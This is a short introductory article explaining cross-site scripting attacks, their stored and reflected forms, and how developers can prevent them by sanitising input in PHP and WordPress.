XSS, an acronym derived from Cross ‘X’ Site Scripting, refers to the injection of malicious scripts into a legitimate website or web application. It is similar to other web attacks such as SQL injection, however, it is more devastating since an XSS attack does not target the application concerned rather it puts the users of the application at risk.
Most of the times the users are not even aware of the malicious script hiding behind the innocent-looking website. All it requires is for the user to interact with the affected website for the script to run. Depending on the severity of the attack, information on user account may be compromised as a result of such an attack.
How are webpages made?
A website as we see them are written using HTML which is a mark-up language. In other words, everything we see are written within tags denoted by the <> symbols. For example, for a bold text in a website all we have to do is write the text within the <b> and </b> tags.
do XSS Attacks work?
Suppose a website does not sanitize the user inputs and a perpetrator takes notice of that. He can now inject his own malicious scripts into the website and wait for some other user to fall into his trap. Such attacks may be used to steal the visitor’s session cookies. Each time a new visitor enables the script, the session cookie is sent to the perpetrator. Using the cookies, the perpetrator now can pose as the user since the cookie stores the user session and now he becomes entitled to do and see everything the user is entitled to
Apart from stealing user’s session cookies, the perpetrator can also read and modify the page running in the browser and may send HTTP requests to arbitrary destinations
The most common target of such attacks are websites that allow users to share contents such as blogs, social network which allows users to share texts, images and videos and message other users.
Types of XSS Attacks
There are two types of XSS Attacks
• Stored XSS – Stored XSS attack is what we discussed above. It is the more damaging between the two as it can be automated, that is, it can be triggered just by visiting the affected website.
• Reflected XSS – Reflected XSS attack requires the user to click on a particular link. The malicious script is embedded on a link, which is one of the reasons why one must never click on unknown links.
How to Prevent XSS Attacks
As a user, it is almost impossible to recognize an affected website. However, you must always avoid clicking suspicious-looking links which may disguise malicious scripts behind it.
As a developer, it is your responsibility because if it can affect the user, it can affect you as well. Stored XSS attacks are based on unfiltered input options. It can be fixed by validating and sanitizing the inputs in the website.
In PHP, one of the ways to filter the input is by running it through filter_var() method with FILTER_SANITIZE_STRING (removes any tags it finds) or FILTER_SANITIZE_FULL_SPECIAL_CHARS (escapes out any tags it finds) as the filter. Another more complex method for WordPress is wp_kses() which strips evil scripts.
For more details, refer to this article by Wordfence.